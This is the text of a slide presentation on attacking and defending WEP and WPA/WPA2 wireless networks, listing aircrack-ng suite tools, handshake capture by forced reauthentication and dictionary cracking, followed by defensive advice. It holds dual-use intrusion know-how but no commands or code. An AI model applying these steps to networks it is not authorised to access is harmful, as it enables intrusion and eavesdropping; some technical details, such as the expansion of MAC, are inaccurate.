You are on page 1of 14

Attack and

Defense in
Wireless Networks
Presented by Aleksandr Doronin
Outline

Wireless Networks and Security


Attacking and defending WEP
Attacking and defending WPA/WPA2
Common defense techniques
Summary
Wireless Networks and
Security
1) What are Wireless Networks?
A wireless network is the way that a computer is
connected to a router without a physical link.
2) Why do we need?
Facilitates mobility You can use lengthy wires
instead, but someone might trip over them.
3) Why security?
Attacker may hack a victims personal computer
and steal private data or may perform some
illegal activities or crimes using the victims
machine and ID. Also there's a possibility to read
wirelessly transferred data (by using sniffers)
Wireless Networks and
Security
Three security approaches:

1. WEP (Wired Equivalent Privacy)


2. WPA (Wi-Fi Protected Access)
3. WPA2 (Wi-Fi Protected Access, Version
2)

WPA also has two generations named


Enterprise and Personal.
WEP (Wired Equivalent
Privacy)
Encryption:
40 / 64 bits
104 / 128 bits
24 bits are used for IV (Initialization vector)

Passphrase:
Key 1-4
Each WEP key can consist of the letters "A" through "F"
and the numbers "0" through "9". It should be 10 hex or
5 ASCII characters in length for 40/64-bit encryption
and 26 hex or 13 ASCII characters in length for
104/128-bit encryption.
WPA/WPA2 Personal

Encryption:
TKIP
AES

Pre-Shared Key:
A key of 8-63 characters

Key Renewal:
You can choose a Key Renewal period, which
instructs the device how often it should change
encryption keys. The default is 3600 seconds
Attacking WEP
iwconfig a tool for configuring wireless adapters. You
can use this to ensure that your wireless adapter is in
monitor mode which is essential to sending fake ARP
(Address Resolution Protocol) requests to the target
router
macchanger a tool that allows you to view and/or
spoof (fake) your MAC address
airmon a tool that can help you set your wireless
adapter into monitor mode (rfmon)
airodump a tool for capturing packets from a wireless
router (otherwise known as an AP)
aireplay a tool for forging ARP requests
aircrack a tool for decrypting WEP keys
How to defend when using
WEP
Use longer WEP encryption keys, which makes the data analysis
task more difficult. If your WLAN equipment supports 128-bit WEP
keys.
Change your WEP keys frequently. There are devices that support
"dynamic WEP" which is off the standard but allows different WEP
keys to be assigned to each user.
Use a VPN for any protocol, including WEP, that may include
sensitive information.
Implement a different technique for encrypting traffic, such as
IPSec over wireless. To do this, you will probably need to install
IPsec software on each wireless client, install an IPSec server in
your wired network, and use a VLAN to the access points to the
IPSec server.
Attacking WPA
macchanger a tool that allows you to view and/or
spoof (fake) your MAC address
airmon a tool that can help you set your wireless
adapter into monitor mode (rfmon)
airodump a tool for capturing packets from a wireless
router (otherwise known as an AP)
aireplay a tool for forging ARP requests
Capture WPA/WPA2 handshakes by forcing clients to
reauthenticate
Generate new Initialization Vectors
aircrack a tool for decrypting WEP keys (should be
used with dictionary)
How to defend when using
WPA
Passphrases the only way to crack WPA is to
sniff the password PMK associated with the
handshake authentication process, and if this
password is extremely complicated it will be
almost impossible to crack

Passphrase Complexity select a random


passphrase that is not made up of dictionary
words. Select a complex passphrase of a
minimum of 20 characters in length and
change it at regular intervals
Common defense techniques
Change router default user name and password
Change the internal IP subnet if possible
Change default name and hide broadcasting of the SSID
(Service Set Identier)
None of the attack methods are faster or effective
when a larger passphrase is used.
Restrict access to your wireless network by filtering
access based on the MAC (Media Access Code) addresses
Use Encryption
Summary

Change all possible default router settings


Use encryption (WPA/WPA2)
Use long and complex keys/passphrases
Thank you!
References

http://www.backtrack-linux.org/
http://www.aircrack-ng.org/
http://www.youtube.com/results?
search_query=cracking+WEP+and+WPA+with+backtrack&
oq=cracking+WEP+and+WPA+with+backtrack&aq=f&aqi=
&aql=1&gs_sm=e&gs_upl=1621l12434l0l12642l47l46l0l30
l0l0l412l4248l0.3.8.3.2l16l0